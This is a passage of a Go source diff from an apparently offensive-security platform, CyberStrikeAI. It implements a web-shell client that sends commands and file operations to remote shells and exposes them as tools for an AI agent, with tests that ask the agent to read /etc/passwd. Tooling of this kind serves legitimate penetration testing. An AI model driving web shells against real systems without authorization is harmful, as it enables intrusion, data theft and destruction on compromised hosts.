c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
conn, err := h.db.GetWebshellConnection(id)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if conn == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"})
|
||||
return
|
||||
}
|
||||
var req struct {
|
||||
State json.RawMessage `json:"state"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
raw := req.State
|
||||
if len(raw) == 0 {
|
||||
raw = json.RawMessage(`{}`)
|
||||
}
|
||||
if len(raw) > 2*1024*1024 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "state payload too large (max 2MB)"})
|
||||
return
|
||||
}
|
||||
var anyJSON interface{}
|
||||
if err := json.Unmarshal(raw, &anyJSON); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "state must be valid json"})
|
||||
return
|
||||
}
|
||||
if err := h.db.UpsertWebshellConnectionState(id, string(raw)); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
// GetAIHistory 获取指定 WebShell 连接的 AI 助手对话历史(GET /api/webshell/connections/:id/ai-history)
|
||||
func (h *WebShellHandler) GetAIHistory(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
conv, err := h.db.GetConversationByWebshellConnectionID(id)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取 WebShell AI 对话失败", zap.String("connectionId", id), zap.Error(err))
|
||||
c.JSON(http.StatusOK, gin.H{"conversationId": nil, "messages": []database.Message{}})
|
||||
return
|
||||
}
|
||||
if conv == nil {
|
||||
c.JSON(http.StatusOK, gin.H{"conversationId": nil, "messages": []database.Message{}})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"conversationId": conv.ID, "messages": conv.Messages})
|
||||
}
|
||||
|
||||
// ListAIConversations 列出该 WebShell 连接下的所有 AI 对话(供侧边栏)
|
||||
func (h *WebShellHandler) ListAIConversations(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"})
|
||||
return
|
||||
}
|
||||
id := strings.TrimSpace(c.Param("id"))
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"})
|
||||
return
|
||||
}
|
||||
list, err := h.db.ListConversationsByWebshellConnectionID(id)
|
||||
if err != nil {
|
||||
h.logger.Warn("列出 WebShell AI 对话失败", zap.String("connectionId", id), zap.Error(err))
|
||||
c.JSON(http.StatusOK, []database.WebShellConversationItem{})
|
||||
return
|
||||
}
|
||||
if list == nil {
|
||||
list = []database.WebShellConversationItem{}
|
||||
}
|
||||
c.JSON(http.StatusOK, list)
|
||||
}
|
||||
|
||||
// ExecRequest 执行命令请求(前端传入连接信息 + 命令)
|
||||
type ExecRequest struct {
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"` // php, asp, aspx, jsp, custom
|
||||
Method string `json:"method"` // GET 或 POST,空则默认 POST
|
||||
CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd
|
||||
Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto
|
||||
OS string `json:"os"` // 目标操作系统:auto / linux / windows,当前 exec 不用它,保留字段便于未来扩展
|
||||
Command string `json:"command" binding:"required"`
|
||||
}
|
||||
|
||||
// ExecResponse 执行命令响应
|
||||
type ExecResponse struct {
|
||||
OK bool `json:"ok"`
|
||||
Output string `json:"output"`
|
||||
Error string `json:"error,omitempty"`
|
||||
HTTPCode int `json:"http_code,omitempty"`
|
||||
}
|
||||
|
||||
// FileOpRequest 文件操作请求
|
||||
type FileOpRequest struct {
|
||||
URL string `json:"url" binding:"required"`
|
||||
Password string `json:"password"`
|
||||
Type string `json:"type"`
|
||||
Method string `json:"method"` // GET 或 POST,空则默认 POST
|
||||
CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd
|
||||
Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto
|
||||
OS string `json:"os"` // 目标操作系统:auto / linux / windows,空则按 shellType 推断
|
||||
ConnectionID string `json:"connection_id,omitempty"` // 可选:连接 ID;服务端探活出 OS 后会回写到此连接
|
||||
Action string `json:"action" binding:"required"` // list, read, delete, write, mkdir, rename, upload, upload_chunk
|
||||
Path string `json:"path"`
|
||||
TargetPath string `json:"target_path"` // rename 时目标路径
|
||||
Content string `json:"content"` // write/upload 时使用
|
||||
ChunkIndex int `json:"chunk_index"` // upload_chunk 时,0 表示首块
|
||||
}
|
||||
|
||||
// FileOpResponse 文件操作响应
|
||||
type FileOpResponse struct {
|
||||
OK bool `json:"ok"`
|
||||
Output string `json:"output"`
|
||||
Error string `json:"error,omitempty"`
|
||||
DetectedOS string `json:"detected_os,omitempty"` // 仅在 auto 模式且探活成功时返回,前端应更新本地缓存
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) Exec(c *gin.Context) {
|
||||
var req ExecRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
req.URL = strings.TrimSpace(req.URL)
|
||||
req.Command = strings.TrimSpace(req.Command)
|
||||
if req.URL == "" || req.Command == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "url and command are required"})
|
||||
return
|
||||
}
|
||||
|
||||
parsed, err := url.Parse(req.URL)
|
||||
if err != nil || (parsed.Scheme != "http" && parsed.Scheme != "https") {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url: only http(s) allowed"})
|
||||
return
|
||||
}
|
||||
|
||||
useGET := strings.ToUpper(strings.TrimSpace(req.Method)) == "GET"
|
||||
cmdParam := strings.TrimSpace(req.CmdParam)
|
||||
if cmdParam == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
var httpReq *http.Request
|
||||
if useGET {
|
||||
targetURL := h.buildExecURL(req.URL, req.Type, req.Password, cmdParam, req.Command)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(req.Type, req.Password, cmdParam, req.Command)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, req.URL, bytes.NewReader(body))
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
if err != nil {
|
||||
h.logger.Warn("webshell exec NewRequest", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, ExecResponse{OK: false, Error: err.Error()})
|
||||
return
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
h.logger.Warn("webshell exec Do", zap.String("url", req.URL), zap.Error(err))
|
||||
c.JSON(http.StatusOK, ExecResponse{OK: false, Error: err.Error()})
|
||||
return
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
out, readErr := io.ReadAll(resp.Body)
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell exec read body", zap.Error(readErr))
|
||||
}
|
||||
output := decodeWebshellOutput(out, req.Encoding)
|
||||
httpCode := resp.StatusCode
|
||||
|
||||
ok := resp.StatusCode == http.StatusOK
|
||||
c.JSON(http.StatusOK, ExecResponse{
|
||||
OK: ok,
|
||||
Output: output,
|
||||
HTTPCode: httpCode,
|
||||
})
|
||||
}
|
||||
|
||||
// buildExecBody 按常见 WebShell 约定构建 POST 体(多数使用 pass + cmd,可配置命令参数名)
|
||||
func (h *WebShellHandler) buildExecBody(shellType, password, cmdParam, command string) []byte {
|
||||
form := h.execParams(shellType, password, cmdParam, command)
|
||||
return []byte(form.Encode())
|
||||
}
|
||||
|
||||
// buildExecURL 构建 GET 请求的完整 URL(baseURL + ?pass=xxx&cmd=yyy,cmd 可配置)
|
||||
func (h *WebShellHandler) buildExecURL(baseURL, shellType, password, cmdParam, command string) string {
|
||||
form := h.execParams(shellType, password, cmdParam, command)
|
||||
if parsed, err := url.Parse(baseURL); err == nil {
|
||||
parsed.RawQuery = form.Encode()
|
||||
return parsed.String()
|
||||
}
|
||||
return baseURL + "?" + form.Encode()
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) execParams(shellType, password, cmdParam, command string) url.Values {
|
||||
shellType = strings.ToLower(strings.TrimSpace(shellType))
|
||||
if shellType == "" {
|
||||
shellType = "php"
|
||||
}
|
||||
if strings.TrimSpace(cmdParam) == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
form := url.Values{}
|
||||
form.Set("pass", password)
|
||||
form.Set(cmdParam, command)
|
||||
return form
|
||||
}
|
||||
|
||||
func (h *WebShellHandler) FileOp(c *gin.Context) {
|
||||
var req FileOpRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
req.URL = strings.TrimSpace(req.URL)
|
||||
req.Action = strings.ToLower(strings.TrimSpace(req.Action))
|
||||
if req.URL == "" || req.Action == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "url and action are required"})
|
||||
return
|
||||
}
|
||||
|
||||
parsed, err := url.Parse(req.URL)
|
||||
if err != nil || (parsed.Scheme != "http" && parsed.Scheme != "https") {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url: only http(s) allowed"})
|
||||
return
|
||||
}
|
||||
|
||||
// 若 OS 未显式配置,先发一次探活命令,识别出真实 OS 再构造文件操作命令。
|
||||
// 这解决了 "Windows + PHP + OS=auto" 场景下旧 fallback 错发 `ls -la` 导致目录列不出来的问题。
|
||||
osTag := req.OS
|
||||
detectedOS := ""
|
||||
if normalizeWebshellOS(osTag) == "auto" {
|
||||
if probed := probeWebshellOSViaExec(h.newHTTPExecFn(req.URL, req.Password, req.Type, req.Method, req.CmdParam, req.Encoding)); probed != "" {
|
||||
osTag = probed
|
||||
detectedOS = probed
|
||||
// 若前端带了 connection_id,顺带把探活结果持久化到该连接,后续刷新零成本
|
||||
if cid := strings.TrimSpace(req.ConnectionID); cid != "" {
|
||||
h.persistDetectedOS(cid, probed)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
command, cmdErr := h.buildFileCommand(fileCommandInput{
|
||||
Action: req.Action,
|
||||
Path: req.Path,
|
||||
TargetPath: req.TargetPath,
|
||||
Content: req.Content,
|
||||
ChunkIndex: req.ChunkIndex,
|
||||
OS: osTag,
|
||||
ShellType: req.Type,
|
||||
})
|
||||
if cmdErr != nil {
|
||||
c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: cmdErr.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
useGET := strings.ToUpper(strings.TrimSpace(req.Method)) == "GET"
|
||||
cmdParam := strings.TrimSpace(req.CmdParam)
|
||||
if cmdParam == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
var httpReq *http.Request
|
||||
if useGET {
|
||||
targetURL := h.buildExecURL(req.URL, req.Type, req.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(req.Type, req.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, req.URL, bytes.NewReader(body))
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, FileOpResponse{OK: false, Error: err.Error()})
|
||||
return
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusOK, FileOpResponse{OK: false, Error: err.Error()})
|
||||
return
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
out, readErr := io.ReadAll(resp.Body)
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell fileop read body", zap.Error(readErr))
|
||||
}
|
||||
output := decodeWebshellOutput(out, req.Encoding)
|
||||
|
||||
c.JSON(http.StatusOK, FileOpResponse{
|
||||
OK: resp.StatusCode == http.StatusOK,
|
||||
Output: output,
|
||||
DetectedOS: detectedOS,
|
||||
})
|
||||
}
|
||||
|
||||
// ExecWithConnection 在指定 WebShell 连接上执行命令(供 MCP/Agent 等非 HTTP 调用)
|
||||
func (h *WebShellHandler) ExecWithConnection(conn *database.WebShellConnection, command string) (output string, ok bool, errMsg string) {
|
||||
if conn == nil {
|
||||
return "", false, "connection is nil"
|
||||
}
|
||||
command = strings.TrimSpace(command)
|
||||
if command == "" {
|
||||
return "", false, "command is required"
|
||||
}
|
||||
useGET := strings.ToUpper(strings.TrimSpace(conn.Method)) == "GET"
|
||||
cmdParam := strings.TrimSpace(conn.CmdParam)
|
||||
if cmdParam == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
var httpReq *http.Request
|
||||
var err error
|
||||
if useGET {
|
||||
targetURL := h.buildExecURL(conn.URL, conn.Type, conn.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(conn.Type, conn.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, conn.URL, bytes.NewReader(body))
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
if err != nil {
|
||||
return "", false, err.Error()
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return "", false, err.Error()
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
out, readErr := io.ReadAll(resp.Body)
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell ExecWithConnection read body", zap.Error(readErr))
|
||||
}
|
||||
return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, ""
|
||||
}
|
||||
|
||||
// FileOpWithConnection 在指定 WebShell 连接上执行文件操作(供 MCP/Agent 调用),支持 list / read / write
|
||||
func (h *WebShellHandler) FileOpWithConnection(conn *database.WebShellConnection, action, path, content, targetPath string) (output string, ok bool, errMsg string) {
|
||||
if conn == nil {
|
||||
return "", false, "connection is nil"
|
||||
}
|
||||
action = strings.ToLower(strings.TrimSpace(action))
|
||||
// MCP 入口仅开放 list / read / write 三种动作,与工具文档的承诺保持一致
|
||||
switch action {
|
||||
case "list", "read", "write":
|
||||
// 支持的动作
|
||||
default:
|
||||
return "", false, "unsupported action: " + action + " (supported: list, read, write)"
|
||||
}
|
||||
|
||||
// 若连接的 OS 为 auto,先探活并持久化,避免 AI/MCP 每次都对 Windows 发 `ls -la`
|
||||
osTag := conn.OS
|
||||
if normalizeWebshellOS(osTag) == "auto" {
|
||||
if probed := probeWebshellOSViaExec(func(cmd string) (string, bool) {
|
||||
out, exOk, _ := h.ExecWithConnection(conn, cmd)
|
||||
return out, exOk
|
||||
}); probed != "" {
|
||||
osTag = probed
|
||||
conn.OS = probed // 本次请求内使用探活结果
|
||||
h.persistDetectedOS(conn.ID, probed)
|
||||
}
|
||||
}
|
||||
|
||||
command, cmdErr := h.buildFileCommand(fileCommandInput{
|
||||
Action: action,
|
||||
Path: path,
|
||||
TargetPath: targetPath,
|
||||
Content: content,
|
||||
OS: osTag,
|
||||
ShellType: conn.Type,
|
||||
})
|
||||
if cmdErr != nil {
|
||||
return "", false, cmdErr.Error()
|
||||
}
|
||||
useGET := strings.ToUpper(strings.TrimSpace(conn.Method)) == "GET"
|
||||
cmdParam := strings.TrimSpace(conn.CmdParam)
|
||||
if cmdParam == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
var httpReq *http.Request
|
||||
var err error
|
||||
if useGET {
|
||||
targetURL := h.buildExecURL(conn.URL, conn.Type, conn.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(conn.Type, conn.Password, cmdParam, command)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, conn.URL, bytes.NewReader(body))
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
if err != nil {
|
||||
return "", false, err.Error()
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return "", false, err.Error()
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
out, readErr := io.ReadAll(resp.Body)
|
||||
if readErr != nil {
|
||||
h.logger.Warn("webshell FileOpWithConnection read body", zap.Error(readErr))
|
||||
}
|
||||
return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, ""
|
||||
}
|
||||
@@ -0,0 +1,106 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
)
|
||||
|
||||
// WebshellSkillHintDefault 对话页 / Eino 单代理共用的 Skills 说明,放在 webshell 上下文末尾,
|
||||
// 供 AI 选择 skill 加载入口时参考。
|
||||
const WebshellSkillHintDefault = "Skills 包请使用「多代理 / Eino DeepAgent」会话中的内置 `skill` 工具渐进加载。"
|
||||
|
||||
// WebshellSkillHintMultiAgent 多代理 / Eino 多代理准备阶段使用的 Skills 说明
|
||||
const WebshellSkillHintMultiAgent = "Skills 包请使用 Eino 多代理内置 `skill` 工具。"
|
||||
|
||||
// webshellAssistantToolList AI 助手在 WebShell 上下文下允许使用的工具清单(展示给模型用)。
|
||||
// 注意:此处只是展示字符串,真正的权限限制是在调用方设置的 roleTools 切片里。
|
||||
const webshellAssistantToolList = "webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_vulnerabilities、get_vulnerability、upsert_project_fact、get_project_fact、list_project_facts、search_project_facts、deprecate_project_fact、restore_project_fact、list_knowledge_risk_types、search_knowledge_base"
|
||||
|
||||
// BuildWebshellAssistantContext 根据连接信息与用户原始消息组装 AI 助手的上下文提示词。
|
||||
// 上下文包含:连接 ID、备注、目标系统(及对应命令集建议)、响应编码、可用工具清单、Skills 加载入口、
|
||||
// 以及最终的用户请求。调用方只需要决定 skillHint 的文案(默认使用 WebshellSkillHintDefault)。
|
||||
//
|
||||
// 之所以把这段逻辑抽到共享函数里,是为了避免 agent.go / multi_agent_prepare.go 等多处复制粘贴,
|
||||
// 并确保当我们升级 OS / Encoding 文案时只需要改一处、测一处、同步生效。
|
||||
func BuildWebshellAssistantContext(conn *database.WebShellConnection, skillHint, userMsg string) string {
|
||||
if conn == nil {
|
||||
// 兜底:调用方已保证 conn 非 nil,这里只是防御性返回原消息
|
||||
return userMsg
|
||||
}
|
||||
remark := conn.Remark
|
||||
if remark == "" {
|
||||
remark = conn.URL
|
||||
}
|
||||
|
||||
targetOS := resolveWebshellOS(conn.OS, conn.Type) // 归一为 "linux" / "windows"
|
||||
encoding := normalizeWebshellEncoding(conn.Encoding)
|
||||
if skillHint == "" {
|
||||
skillHint = WebshellSkillHintDefault
|
||||
}
|
||||
|
||||
var b strings.Builder
|
||||
b.Grow(512 + len(userMsg))
|
||||
|
||||
b.WriteString("[WebShell 助手上下文] 连接 ID:")
|
||||
b.WriteString(conn.ID)
|
||||
b.WriteString(",备注:")
|
||||
b.WriteString(remark)
|
||||
b.WriteByte('\n')
|
||||
|
||||
// 目标系统:明确告诉 AI 能用/不能用的命令集,避免它对着 Windows 发 ls/cat/rm
|
||||
b.WriteString("- 目标系统:")
|
||||
b.WriteString(describeTargetOSForPrompt(targetOS))
|
||||
b.WriteByte('\n')
|
||||
|
||||
// 响应编码:仅在非 auto 时显式告知,auto 模式由后端自适应,不打扰模型
|
||||
if encHint := describeEncodingForPrompt(encoding); encHint != "" {
|
||||
b.WriteString("- 响应编码:")
|
||||
b.WriteString(encHint)
|
||||
b.WriteByte('\n')
|
||||
}
|
||||
|
||||
// 工具清单 & connection_id 约束:保持旧有表达,AI 已熟悉
|
||||
b.WriteString("可用工具(仅在该连接上操作时使用,connection_id 填 \"")
|
||||
b.WriteString(conn.ID)
|
||||
b.WriteString("\"):")
|
||||
b.WriteString(webshellAssistantToolList)
|
||||
b.WriteString("。边渗透边记录:每确认新认知即 upsert_project_fact,每验证漏洞即 record_vulnerability,勿等会话结束。")
|
||||
b.WriteString(skillHint)
|
||||
b.WriteString("\n\n用户请求:")
|
||||
b.WriteString(userMsg)
|
||||
|
||||
return b.String()
|
||||
}
|
||||
|
||||
// describeTargetOSForPrompt 返回某个 OS 对应的中文描述 + 推荐命令集 + 反例,
|
||||
// 命令列表覆盖文件管理最常用的 6 类动作(查看/读/删/改名/建目录/查找),让 AI 能直接照抄。
|
||||
func describeTargetOSForPrompt(targetOS string) string {
|
||||
switch targetOS {
|
||||
case "windows":
|
||||
return "Windows(推荐 cmd/PowerShell:dir /a、type、del /q /f、move /y、md、ren;" +
|
||||
"查找文件用 `dir /s /b 过滤词` 或 PowerShell `Get-ChildItem -Recurse`;" +
|
||||
"避免 ls / cat / rm / mv / find 等 Unix 命令,否则将返回 `不是内部或外部命令`)"
|
||||
case "linux":
|
||||
return "Linux/Unix(推荐 sh/bash:ls -la、cat、rm -f、mv、mkdir -p;" +
|
||||
"查找文件用 `find /path -name '*pattern*'`;" +
|
||||
"避免 dir、type、del、move 等 Windows 命令)"
|
||||
default:
|
||||
// 理论上不会走到这里,resolveWebshellOS 已经兜底
|
||||
return "未知(请先执行 `uname || ver` 探测再决定命令集)"
|
||||
}
|
||||
}
|
||||
|
||||
// describeEncodingForPrompt 返回响应编码的人类可读描述;auto 返回空串以减少 token。
|
||||
func describeEncodingForPrompt(encoding string) string {
|
||||
switch encoding {
|
||||
case "utf-8":
|
||||
return "UTF-8(目标原生 UTF-8,无需额外解码)"
|
||||
case "gbk":
|
||||
return "GBK(中文 Windows;后端已自动转码为 UTF-8 返回,若仍出现大量 \\uFFFD 替换字符说明命令失败或编码识别错误)"
|
||||
case "gb18030":
|
||||
return "GB18030(后端已自动转码为 UTF-8 返回)"
|
||||
default:
|
||||
return ""
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,170 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
)
|
||||
|
||||
func TestBuildWebshellAssistantContext_WindowsExplicit(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_win01",
|
||||
Remark: "IIS Windows 靶机",
|
||||
URL: "http://example.com/shell.php",
|
||||
Type: "php",
|
||||
OS: "windows",
|
||||
Encoding: "gbk",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "列出当前目录并告诉我 flag 在哪")
|
||||
|
||||
mustContain(t, got,
|
||||
"[WebShell 助手上下文]",
|
||||
"ws_win01",
|
||||
"IIS Windows 靶机",
|
||||
"目标系统:Windows",
|
||||
"dir /a",
|
||||
"move /y",
|
||||
"避免 ls / cat / rm",
|
||||
"响应编码:GBK",
|
||||
"后端已自动转码为 UTF-8",
|
||||
"connection_id 填 \"ws_win01\"",
|
||||
"webshell_exec、webshell_file_list",
|
||||
WebshellSkillHintDefault,
|
||||
"用户请求:列出当前目录并告诉我 flag 在哪",
|
||||
)
|
||||
// Windows 场景下不应出现 Linux 命令推荐
|
||||
mustNotContain(t, got, "推荐 sh/bash")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_LinuxAutoFromPHP(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_lnx01",
|
||||
Remark: "", // 测试备注为空时 fallback URL
|
||||
URL: "http://example.com/a.php",
|
||||
Type: "php",
|
||||
OS: "auto", // auto + php → linux
|
||||
Encoding: "", // auto 编码不显式提示
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "看看 /etc/passwd")
|
||||
|
||||
mustContain(t, got,
|
||||
"连接 ID:ws_lnx01",
|
||||
"备注:http://example.com/a.php", // 备注空时 fallback URL
|
||||
"目标系统:Linux/Unix",
|
||||
"ls -la",
|
||||
"mkdir -p",
|
||||
"避免 dir、type、del、move",
|
||||
"用户请求:看看 /etc/passwd",
|
||||
)
|
||||
// encoding=auto 不应出现"响应编码:"这一行
|
||||
mustNotContain(t, got, "响应编码:")
|
||||
// Linux 场景不应出现 Windows 命令
|
||||
mustNotContain(t, got, "推荐 cmd/PowerShell")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_AutoFromASPDefaultsToWindows(t *testing.T) {
|
||||
// 保留向后兼容:旧连接没配 os,shellType=asp 时应视为 Windows
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_asp01",
|
||||
Remark: "老 ASP 靶机",
|
||||
Type: "asp",
|
||||
OS: "", // 空串等同 auto
|
||||
Encoding: "gb18030",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "查当前用户")
|
||||
|
||||
mustContain(t, got,
|
||||
"目标系统:Windows",
|
||||
"响应编码:GB18030",
|
||||
"后端已自动转码为 UTF-8 返回",
|
||||
WebshellSkillHintMultiAgent,
|
||||
)
|
||||
// 多代理 skill 文案里没有 DeepAgent,不应混入 default 文案
|
||||
mustNotContain(t, got, "DeepAgent")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_MultiAgentSkillHint(t *testing.T) {
|
||||
conn := &database.WebShellConnection{ID: "ws_m1", Remark: "x", Type: "php", OS: "linux"}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, "hi")
|
||||
mustContain(t, got, WebshellSkillHintMultiAgent)
|
||||
mustNotContain(t, got, "DeepAgent")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_DefaultSkillHintFallback(t *testing.T) {
|
||||
conn := &database.WebShellConnection{ID: "ws_d1", Remark: "x", Type: "php", OS: "linux"}
|
||||
// skillHint 传空字符串时应回退到 default
|
||||
got := BuildWebshellAssistantContext(conn, "", "hi")
|
||||
mustContain(t, got, WebshellSkillHintDefault)
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_UTF8EncodingIsAnnotated(t *testing.T) {
|
||||
conn := &database.WebShellConnection{
|
||||
ID: "ws_u1", Remark: "u", Type: "jsp", OS: "linux", Encoding: "utf-8",
|
||||
}
|
||||
got := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, "hi")
|
||||
mustContain(t, got, "响应编码:UTF-8", "目标原生 UTF-8")
|
||||
}
|
||||
|
||||
func TestBuildWebshellAssistantContext_NilConnReturnsUserMsg(t *testing.T) {
|
||||
// 防御性:conn == nil 时不 panic,直接返回原消息
|
||||
got := BuildWebshellAssistantContext(nil, WebshellSkillHintDefault, "just the message")
|
||||
if got != "just the message" {
|
||||
t.Errorf("nil conn should return userMsg as-is, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDescribeTargetOSForPrompt(t *testing.T) {
|
||||
cases := map[string][]string{
|
||||
"windows": {"Windows", "dir /a", "move /y", "PowerShell"},
|
||||
"linux": {"Linux/Unix", "ls -la", "mkdir -p"},
|
||||
"": {"未知", "uname"}, // 防御性分支
|
||||
}
|
||||
for in, wants := range cases {
|
||||
got := describeTargetOSForPrompt(in)
|
||||
for _, w := range wants {
|
||||
if !strings.Contains(got, w) {
|
||||
t.Errorf("describeTargetOSForPrompt(%q) should contain %q, got: %s", in, w, got)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDescribeEncodingForPrompt(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"utf-8": "UTF-8",
|
||||
"gbk": "GBK",
|
||||
"gb18030": "GB18030",
|
||||
"auto": "",
|
||||
"": "",
|
||||
}
|
||||
for in, want := range cases {
|
||||
got := describeEncodingForPrompt(in)
|
||||
if want == "" && got != "" {
|
||||
t.Errorf("describeEncodingForPrompt(%q) should return empty string, got: %s", in, got)
|
||||
}
|
||||
if want != "" && !strings.Contains(got, want) {
|
||||
t.Errorf("describeEncodingForPrompt(%q) should contain %q, got: %s", in, want, got)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ---- 小工具 ----
|
||||
|
||||
func mustContain(t *testing.T, text string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(text, s) {
|
||||
t.Errorf("expected text to contain %q\n--- text ---\n%s", s, text)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func mustNotContain(t *testing.T, text string, substrings ...string) {
|
||||
